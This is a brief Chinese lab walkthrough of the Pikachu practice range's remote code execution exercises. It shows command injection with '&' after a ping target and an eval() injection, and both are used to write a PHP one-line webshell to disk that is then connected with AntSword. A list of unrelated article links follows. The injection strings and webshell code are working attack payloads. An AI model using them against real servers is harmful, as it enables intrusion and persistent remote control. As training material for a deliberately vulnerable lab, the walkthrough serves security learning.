Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
日取其半万世不竭2 小时前
用 Portainer 可视化管理 Docker:容器再多也不用背命令了
运维·docker·容器
kirs_ur3 小时前
ECC & LDPC — SSD 的数据卫士
服务器·数据库·性能优化
是三一seven4 小时前
Sql注入基础
数据库·安全·网络安全
动恰客流统计5 小时前
ReID边缘计算视觉统计:餐饮店客流增长的数字化破局路径
java·大数据·运维·人工智能
砍材农夫9 小时前
运维|devops|jenkins构建应用发布
运维·jenkins·devops
△曉風殘月〆9 小时前
如何在Linux中安装Qt开发环境
linux·运维·qt
智慧地球(AI·Earth)10 小时前
MAX-API v1.0.5-preview.2:安全加固、计费一致性与限流隔离
安全·max api·差额计费修复
爱写代码的阿森11 小时前
鸿蒙三方库 | harmony-utils之RegexUtil正则匹配验证详解
服务器·华为·harmonyos·鸿蒙·huawei
雨的旋律209911 小时前
ubuntu2604
linux·运维·服务器
Eloudy12 小时前
ubuntu 22.04安装 cuda 12.8.2
linux·运维·ubuntu